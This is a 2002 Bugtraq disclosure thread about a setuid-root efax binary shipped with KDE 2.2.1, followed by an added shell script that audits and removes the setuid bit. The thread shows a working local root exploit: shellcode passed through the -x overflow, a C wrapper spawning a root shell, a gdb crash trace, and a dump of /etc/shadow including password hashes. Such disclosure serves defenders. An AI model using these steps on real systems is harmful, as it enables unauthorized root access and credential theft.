Bugtraq mailing list archives

Re: efax


From: H D Moore <sflist () digitaloffense net>
Date: Wed, 16 Jan 2002 03:55:27 -0600

Since this is getting cc'd to bugtraq, here is a little background:

The version of efax I have was part of a kde-2.2.1 source build and install. 
The efax program was shipped as part of the klprfax app in the kdeutils
package. The makefile sets this binary to be setuid root on install:

hdm@sliver:~/kdeutils-2.2.1/klprfax > grep chown . -r
./efax/fax:     case $OWNER in '') ;; *) chown $OWNER /dev/$DEV ;; esac
./efax/Makefile:        @(chown root $(bindir)/efax && chmod 4755 $(bindir)/efax) || echo "Was not able to make efax setuid root"
./efax/Makefile.am:     @(chown root $(bindir)/efax && chmod 4755 $(bindir)/efax) || echo "Was not able to make efax setuid root"
./efax/Makefile.in:     @(chown root $(bindir)/efax && chmod 4755 $(bindir)/efax) || echo "Was not able to make efax setuid root"
./klprfax/klprfax_lpd.in:    chown root $SPOOL/klprfax
./klprfax/klprfax_lpd:    chown root $SPOOL/klprfax
hdm@sliver:~/kdeutils-2.2.1/klprfax >

This has been fixed in KDE 2.2.2 and I have not seen a distro yet that ships 
with efax installed suid root. However, if you installed KDE 2.2.1 from source,
then there is a good chance your efax binary is still setuid.

I posted a message to vuln-dev stating that I found a setuid copy of efax and
that I was able to read arbitrary files with the -d parameter (/etc/shadow).
Wodahs responded saying he found an overflow in the -x parameter.

The overflow that he found is easily exploitable:

Running /bin/id:

hdm@sliver> efax -x $EX
efax: Wed Jan 16 03:43:10 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
efax: Wed Jan 16 03:43:10 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
efax: 43:10 compiled Aug 16 2001 10:23:23
efax: 43:10 Error: can't open pre-lock file <nops>ë^)ÀˆF‰F
                     ‰°
                       ‡óS
                            ̀)À@̀èÞÿÿÿ/bin/idAÿ¿/TMP..08795: File name too long
uid=500(hdm) gid=100(users) euid=0(root) groups=100(users)


Getting a root shell:

hdm@sliver > echo 'void main(void){setuid(0);system("/bin/sh");}' > /tmp/ex.c
hdm@sliver > gcc -o /tmp/ex /tmp/ex.c
/tmp/ex.c: In function `main':
/tmp/ex.c:1: warning: return type of `main' is not `int'
hdm@sliver > export EX=`perl genshell.pl 1029 $ADDR`
shell code is: 43 bytes
hdm@sliver > efax -x $EX
efax: Wed Jan 16 03:46:21 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
efax: Wed Jan 16 03:46:21 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
efax: 46:21 compiled Aug 16 2001 10:23:23
efax: 46:21 Error: can't open pre-lock file <nops>ë^)ÀˆF‰F
                     ‰°
                       ‡óS
                            ̀)À@̀èÞÿÿÿ/tmp/exAÿ¿/TMP..08846: File name too long
sh-2.04#

On Wednesday 16 January 2002 03:03 am, Wodahs Latigid wrote:
I found a buffer overflow in efax a while back,
reported it and didn't get a response. Here's
the original email:
-----------------------------------------------
To: edc () cce com
Subject: Efax Buffer Overflow
You may or may not be interested (as this has no
major impact on the outside world), but there
is a buffer overflow in the -x function of
efax. Obviously, efax should not be setuid
root, but I can imagine a situation with an
administrator doing so to give "trusted" users
access to the fax facility.
-----------------------------------------------

And here's more detail:

# cat /etc/mandrake-release
Linux Mandrake release 8.0 (Traktopel) for i586

Starting program: /usr/bin/efax -x `perl -e "print 'A' x 1200"`
/usr/bin/efax: Wed Jan 16 09:54:49 2002 efax v 0.9 Copyright 1999 Ed Casas
efax: 54:49 Error: can't open pre-lock file AAAA..[A's Cut]..AAAATMP..25717: File name too long
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) inf reg
.. stuff cut ..
edx            0x65656565       1701143909
ebx            0x41414141       1094795585
esp            0xbffefd58       0xbffefd58
ebp            0x41414141       0x41414141
esi            0x41414141       1094795585
edi            0x41414141       1094795585
eip            0x41414141       0x41414141
.. stuff cut ..

Digital Shadow
http://www.ministryofpeace.co.uk/



-----Original Message-----
From: H D Moore <sflist () digitaloffense net>
Date: Tue, 15 Jan 2002 18:44:57 -0600
To: VULN-DEV () SECURITYFOCUS COM
Subject: efax

Didn't see this mentioned before...

hdm@sliver:~ > which efax
/opt/kde2/bin/efax
hdm@sliver:~ > ls -la /opt/kde2/bin/efax
-rwsr-xr-x    1 root     root        96689 Aug 16 10:23 /opt/kde2/bin/efax
hdm@sliver:~ > efax -h
efax: Tue Jan 15 18:43:28 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
efax: Tue Jan 15 18:43:28 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
efax: 43:28 compiled Aug 16 2001 10:23:23
efax: 43:28 Error: no argument for (-h)
Usage:
  efax [ option ]... [ -t num [ file... ] ]
Options:
  -a str  use command ATstr to answer
  -c cap  set modem and receive capabilites to cap
  -d dev  use modem on device dev
  -e cmd  exec "/bin/sh -c cmd" for voice calls
  -f fnt  use (PBM) font file fnt for headers
  -g cmd  exec "/bin/sh -c cmd" for data calls
  -h hdr  use page header hdr (use %d's for current page/total pages)
  -i str  send modem command ATstr at start
  -j str  send modem command ATstr after set fax mode
  -k str  send modem command ATstr when done
  -l id   set local identification to id
  -o opt  use protocol option opt:
      0     use class 2.0 instead of class 2 modem commands
      1     use class 1 modem commands
      2     use class 2 modem commands
      a     if first [data mode] answer attempt fails retry as fax
      e     ignore errors in modem initialization commands
      f     use virtual flow control
      h     use hardware flow control
      l     halve lock file polling interval
      n     ignore page retransmission requests
      r     do not reverse received bit order for Class 2 modems
      x     use XON instead of DC2 to trigger reception
      z     add 100 ms to pause before each modem comand (cumulative)
  -q ne   ask for retransmission if more than ne errors per page
  -r pat  save received pages into files pat.001, pat.002, ...
  -s      share (unlock) modem device while waiting for call
  -v lvl  print messages of type in string lvl (ewinchamr)
  -w      don't answer phone, wait for OK or CONNECT instead
  -x fil  use uucp-style lock file fil
Commands:
  -t      dial num and send fax image files file...
efax: 43:28 done, returning 2 (unrecoverable error)
hdm@sliver:~ > efax -d /etc/shadow
efax: Tue Jan 15 18:43:35 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
efax: Tue Jan 15 18:43:35 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
efax: 43:35 compiled Aug 16 2001 10:23:23
efax: 43:35 opened /etc/shadow
efax: 43:35 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for device
efax: 43:35 Warning: unexpected response "root:sjSs9mscTsosA:11521:0:10000::::"
efax: 43:35 Warning: unexpected response "bin:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "daemon:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "lp:*:9473:0:10000::::"
efax: 43:35 Warning: unexpected response "news:*:8902:0:10000::::";
efax: 43:35 Warning: unexpected response "uucp:*:0:0:10000::::"
efax: 43:35 Warning: unexpected response "games:*:0:0:10000::::"
efax: 43:35 Warning: unexpected response "man:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "at:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "lnx:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "mdom:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "yard:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "wwwrun:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "squid:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "postgres:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "fax:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "gnats:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "empress:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "adabas:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "amanda:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "ixess:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "irc:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "ftp:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "firewall:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "informix:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "named:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "virtuoso:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "fnet:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "gdm:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "postfix:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "cyrus:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "nps:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "skyrix:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "dbmaker:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "fixadm:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "fib:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "fixlohn:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "mysql:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "dpbox:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "ingres:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "codadmin:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "zope:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "vscan:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "wnn:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "pop:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "perforce:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "nobody:*:0:0:10000::::"
efax: 43:35 Warning: unexpected response "hdm:snBsN0stfzsMg:11564:0:99999:7:0::"
efax: 43:35 Warning: unexpected response "oracle:!:11556:0:99999:3:0::"
efax: 43:35 Warning: unexpected response "yaku:!:11636:0:99999:3:0::"
efax: 43:35 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for device
efax: 43:35 sync: dropping DTR
efax: 43:35 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for device
efax: 43:36 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for device
efax: 43:36 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for device
efax: 43:36 sync: sending escapes
efax: 43:36 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for device
efax: 43:36 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for device
efax: 43:37 Error: sync: modem not responding
efax: 43:37 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for device
efax: 43:37 done, returning 2 (unrecoverable error)

--
H D Moore
http://www.digitaldefense.net - work
http://www.digitaloffense.net - play

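A defensive check, added here and not part of the thread or of efax/KDE itself: a POSIX shell audit that lists setuid binaries under an install prefix such as /opt/kde2 and clears the bit from any efax it finds, which is the remediation the thread points to (KDE 2.2.2 stopped installing efax setuid root). The prefix, the optional owner argument and the function names are this example's own assumptions.

```shell
#!/bin/sh
# Added example, not code from the thread or from efax/KDE: audit an install
# prefix for setuid binaries and strip the bit from any efax found.
# Assumes POSIX sh, find and chmod; DIR, OWNER and the function names are
# assumptions of this example. Paths are expected to contain no whitespace.

# list_setuid DIR [OWNER]: print regular files under DIR that carry the
# setuid bit and are owned by OWNER (default root).
list_setuid() {
    find "$1" -type f -perm -4000 -user "${2:-root}" 2>/dev/null
}

# count_setuid DIR [OWNER]: number of such files, as a bare integer.
count_setuid() {
    list_setuid "$1" "$2" | wc -l | tr -d ' '
}

# is_setuid PATH: succeed if PATH has the setuid bit set.
is_setuid() {
    [ -u "$1" ]
}

# drop_setuid PATH: clear the setuid bit (the bit the kdeutils-2.2.1
# Makefile set with chmod 4755) and confirm it is gone.
drop_setuid() {
    chmod u-s "$1" && ! is_setuid "$1"
}

# audit_prefix DIR [OWNER]: report every setuid file on stderr, strip the
# bit from any binary named efax, and print how many were fixed.
audit_prefix() {
    fixed=0
    for f in $(list_setuid "$1" "$2"); do
        echo "setuid: $f" >&2
        case ${f##*/} in
            efax) drop_setuid "$f" && fixed=$((fixed + 1)) ;;
        esac
    done
    echo "$fixed"
}

# Usage on a real system (as root, so root-owned files can be changed):
#   audit_prefix /opt/kde2
```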

